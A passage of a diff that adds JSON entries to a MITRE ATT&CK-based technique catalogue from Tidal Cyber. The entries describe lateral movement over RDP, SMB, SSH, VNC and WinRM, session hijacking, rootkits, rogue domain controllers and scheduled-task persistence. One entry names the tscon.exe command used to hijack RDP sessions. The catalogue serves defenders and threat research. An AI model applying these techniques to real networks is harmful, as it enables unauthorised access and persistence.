WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1021.003" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "ebc5fabb-5634-49f2-8979-94ea98da114a", + "value": "Distributed Component Object Model" + }, + { + "description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)] \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba) or [Terminal Services DLL](https://app.tidalcyber.com/technique/ae967542-1f37-4eea-993d-fff3867f2aea) for Persistence.[[Alperovitch Malware](https://app.tidalcyber.com/references/b6635fd7-40ec-4481-bb0a-c1d3391854a7)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1021.001" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "f5fb86b6-abf0-4d44-b4a0-56f0636c24d2", + "value": "Remote Desktop Protocol" + }, + { + "description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to remotely access a networked system over SMB,[[Wikipedia Server Message Block](https://app.tidalcyber.com/references/3ea03c65-12e0-4e28-bbdc-17bb8c1e1831)] to interact with systems using remote procedure calls (RPCs),[[TechNet RPC](https://app.tidalcyber.com/references/7eaa0fa8-953a-482e-8f6b-02607e928525)] transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf), and [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f) and certain configuration and patch levels.[[Microsoft Admin Shares](https://app.tidalcyber.com/references/68d23cb0-b812-4d77-a3aa-34e24a923a50)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1021.002" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd", + "value": "SMB/Windows Admin Shares" + }, + { + "description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1021.004" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "7620ba3a-7877-4f87-90e3-588163ac0474", + "value": "SSH" + }, + { + "description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.[[The Remote Framebuffer Protocol](https://app.tidalcyber.com/references/4c75a00d-aa90-4260-ab7a-2addc17d1728)]\n\nVNC differs from [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.[[MacOS VNC software for Remote Desktop](https://app.tidalcyber.com/references/c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af)][[VNC Authentication](https://app.tidalcyber.com/references/de6e1202-19aa-41af-8446-521abc20200d)]\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.[[Hijacking VNC](https://app.tidalcyber.com/references/7a58938f-058b-4c84-aa95-9c37dcdda1fb)][[macOS root VNC login without authentication](https://app.tidalcyber.com/references/4dc6ea85-a41b-4218-a9ae-e1eea841f2f2)][[VNC Vulnerabilities](https://app.tidalcyber.com/references/3ec5440a-cb3b-4aa9-8e0e-0f92525ef51c)][[Offensive Security VNC Authentication Check](https://app.tidalcyber.com/references/90a5ab3c-c2a8-4b02-9bd7-628672907737)][[Attacking VNC Servers PentestLab](https://app.tidalcyber.com/references/f953ea41-f9ca-4f4e-a46f-ef1d2def1d07)][[Havana authentication bug](https://app.tidalcyber.com/references/255181c2-b1c5-4531-bc16-853f21bc6435)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1021.005" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "af7afc1e-3374-4d1c-917b-c47c305274f5", + "value": "VNC" + }, + { + "description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).[[Microsoft WinRM](https://app.tidalcyber.com/references/ddbe110c-88f1-4774-bcb9-cd18b6218fc4)] It may be called with the `winrm` command or by any number of programs such as PowerShell.[[Jacobsen 2014](https://app.tidalcyber.com/references/f9ca049c-5cab-4d80-a84b-1695365871e3)] WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a).[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1021.006" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "c2866fd3-754e-4b40-897a-e73a8c1fcf7b", + "value": "Windows Remote Management" + }, + { + "description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).[[SSH Secure Shell](https://app.tidalcyber.com/references/ac5fc103-1946-488b-8af5-eda0636cbdd0)][[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)] They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. \n\nLegitimate applications (such as [Software Deployment Tools](https://app.tidalcyber.com/technique/1bcf9fb5-6848-44d9-b394-ffbd3c357058) and other administrative programs) may utilize [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) to send the screen and control buffers and [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474) for secure file transfer.[[Remote Management MDM macOS](https://app.tidalcyber.com/references/e5f59848-7014-487d-9bae-bed81af1b72b)][[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)][[Apple Remote Desktop Admin Guide 3.3](https://app.tidalcyber.com/references/c57c2bba-a398-4e68-b2a7-fddcf0740b61)] Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.[[FireEye 2019 Apple Remote Desktop](https://app.tidalcyber.com/references/bbc72952-988e-4c3c-ab5e-75b64e9e33f5)][[Lockboxx ARD 2019](https://app.tidalcyber.com/references/159f8495-5354-4b93-84cb-a25e56fcff3e)][[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + }, + { + "dest-uuid": "351a3ac7-bf0f-5dc1-b090-5a3d3586f31d", + "type": "similar" + }, + { + "dest-uuid": "852bc9a9-865f-59cd-9e81-bec6e8aa8b78", + "type": "similar" + }, + { + "dest-uuid": "ebc5fabb-5634-49f2-8979-94ea98da114a", + "type": "similar" + }, + { + "dest-uuid": "f5fb86b6-abf0-4d44-b4a0-56f0636c24d2", + "type": "similar" + }, + { + "dest-uuid": "bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd", + "type": "similar" + }, + { + "dest-uuid": "7620ba3a-7877-4f87-90e3-588163ac0474", + "type": "similar" + }, + { + "dest-uuid": "af7afc1e-3374-4d1c-917b-c47c305274f5", + "type": "similar" + }, + { + "dest-uuid": "c2866fd3-754e-4b40-897a-e73a8c1fcf7b", + "type": "similar" + } + ], + "uuid": "30ef3f13-5e9b-4712-9adf-f0da4ef157a1", + "value": "Remote Services" + }, + { + "description": "Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]\n\nAdversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.[[RDP Hijacking Korznikov](https://app.tidalcyber.com/references/8877e1f3-11e6-4ae0-adbd-c9b98b07ee25)] This can be done remotely or locally and with active or disconnected sessions.[[RDP Hijacking Medium](https://app.tidalcyber.com/references/0a615508-c155-4004-86b8-916bbfd8ae42)] It can also lead to [Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.[[Kali Redsnarf](https://app.tidalcyber.com/references/459fcde2-7ac3-4640-a5bc-cd8750e54962)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1563.002" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "a0f4b31b-41b7-4602-914a-f46aa815aadb", + "value": "RDP Hijacking" + }, + { + "description": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.[[Slideshare Abusing SSH](https://app.tidalcyber.com/references/4f63720a-50b6-4eef-826c-71ce8d6e4bb8)][[SSHjack Blackhat](https://app.tidalcyber.com/references/64f94126-de4c-4204-8409-d26804f32cff)][[Clockwork SSH Agent Hijacking](https://app.tidalcyber.com/references/4a4026e3-977a-4f25-aeee-794947f384b2)][[Breach Post-mortem SSH Hijack](https://app.tidalcyber.com/references/f1d15b92-8840-45ae-b23d-0cba20fc22cc)]\n\n[SSH Hijacking](https://app.tidalcyber.com/technique/45f2613d-35dd-4ddc-a222-30e9c0dd6bf6) differs from use of [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1563.001" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "45f2613d-35dd-4ddc-a222-30e9c0dd6bf6", + "value": "SSH Hijacking" + }, + { + "description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://app.tidalcyber.com/technique/c992f340-645d-412a-b509-3cbaf94919b0) differs from use of [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).[[RDP Hijacking Medium](https://app.tidalcyber.com/references/0a615508-c155-4004-86b8-916bbfd8ae42)][[Breach Post-mortem SSH Hijack](https://app.tidalcyber.com/references/f1d15b92-8840-45ae-b23d-0cba20fc22cc)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + }, + { + "dest-uuid": "a0f4b31b-41b7-4602-914a-f46aa815aadb", + "type": "similar" + }, + { + "dest-uuid": "45f2613d-35dd-4ddc-a222-30e9c0dd6bf6", + "type": "similar" + } + ], + "uuid": "c992f340-645d-412a-b509-3cbaf94919b0", + "value": "Remote Service Session Hijacking" + }, + { + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7) or net view using [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc).\n\nAdversaries may also analyze data from local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) or other passive means (such as local [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e) cache entries) in order to discover the presence of remote systems in an environment.\n\nAdversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)][[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)] \n", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "00a9a4d4-928d-4d95-be31-dfac6103991f", + "value": "Remote System Discovery" + }, + { + "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.\n\nMobile devices may also be used to infect PCs with malware if connected via USB.[[Exploiting Smartphone USB ](https://app.tidalcyber.com/references/573796bd-4553-4ae1-884a-9af71b5de873)] This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.[[Windows Malware Infecting Android](https://app.tidalcyber.com/references/3733386a-14bd-44a6-8241-a10660ba25d9)][[iPhone Charging Cable Hack](https://app.tidalcyber.com/references/b8bb0bc5-e131-47b5-8c42-48cd3dc25250)] For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + }, + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "6a7ab25e-49ed-4cd3-b199-5d80b728b416", + "value": "Replication Through Removable Media" + }, + { + "description": "Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)] Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)] Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)][[Trend Micro Exposed Docker APIs](https://app.tidalcyber.com/references/24ae5092-42ea-4c83-bdf7-c0e5026d9559)]\n\nAdditionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.[[Trend Micro War of Crypto Miners](https://app.tidalcyber.com/references/1ba47efe-35f8-4d52-95c7-65cdc829c8e5)]\n\nAdversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311) campaigns and/or to seed malicious torrents.[[GoBotKR](https://app.tidalcyber.com/references/7d70675c-5520-4c81-8880-912ce918c4b5)] Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]", + "meta": { + "platforms": [ + "Containers", + "IaaS", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "d10c4a15-aeaa-4630-a7a3-3373c89a584f", + "value": "Resource Hijacking" + }, + { + "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. [[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)] Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. [[Adsecurity Mimikatz Guide](https://app.tidalcyber.com/references/b251ed65-a145-4053-9dc2-bf0dad83d76c)]\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). [[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)] The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. [[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "c5eb5b88-6c62-4900-9b14-c4d67d420002", + "value": "Rogue Domain Controller" + }, + { + "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. [[Symantec Windows Rootkits](https://app.tidalcyber.com/references/5b8d9094-dabf-4c29-a95b-b90dbcf07382)] \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://app.tidalcyber.com/technique/4050dbda-5cb0-4bd6-8444-841e55611f3a). [[Wikipedia Rootkit](https://app.tidalcyber.com/references/7e877b6b-9873-48e2-b138-e02dcb5268ca)] Rootkits have been seen for Windows, Linux, and Mac OS X systems. [[CrowdStrike Linux Rootkit](https://app.tidalcyber.com/references/eb3590bf-ff12-4ccd-bf9d-cf8eacd82135)] [[BlackHat Mac OSX Rootkit](https://app.tidalcyber.com/references/e01a6d46-5b38-42df-bd46-3995d38bb60e)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "cf2b56f6-3ebd-48ec-b9d9-835397acef89", + "value": "Rootkit" + }, + { + "description": "Adversaries may abuse the [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://app.tidalcyber.com/technique/723c6d51-91db-4658-9ee0-eafb953c2d82)'s [schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) in Windows environments, using [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.\n\nOn Linux and macOS, [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860). If the at.deny exists and is empty, global use of [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860).[[Linux at](https://app.tidalcyber.com/references/3e3a84bc-ab6d-460d-8abc-cafae6eaaedd)]\n\nAdversaries may use [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) to execute programs at system startup or on a scheduled basis for [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393). [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) can also be abused to conduct remote [Execution](https://app.tidalcyber.com/tactics/dad2337d-6d35-410a-acc5-da36ff83ee44) as part of [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and/or to run a process under the context of a specified account (such as SYSTEM).\n\nIn Linux environments, adversaries may also abuse [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) may also be used for [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37) if the binary is allowed to run as superuser via sudo.[[GTFObins at](https://app.tidalcyber.com/references/3fad6618-5a85-4f7a-be2b-0600269d7768)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1053.002" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "6051e618-c476-41db-8b0b-0aef9d2bbbf7", + "value": "At" + }, + { + "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\n\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.[[Kubernetes Jobs](https://app.tidalcyber.com/references/21a4388d-dbf8-487b-a2a2-67927b099e4a)][[Kubernetes CronJob](https://app.tidalcyber.com/references/354d242c-227e-4827-b559-dc1650d37acd)] An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.[[Threat Matrix for Kubernetes](https://app.tidalcyber.com/references/43fab719-e348-4902-8df3-8807765b95f0)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1053.007" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "eb1a471e-e3b5-4790-8c0a-b89b68f244b9", + "value": "Container Orchestration Job" + }, + { + "description": "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)] The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\n\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393). ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1053.003" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "803d286d-8104-4af8-9821-3f49240edc2b", + "value": "Cron" + }, + { + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\n\nThe deprecated 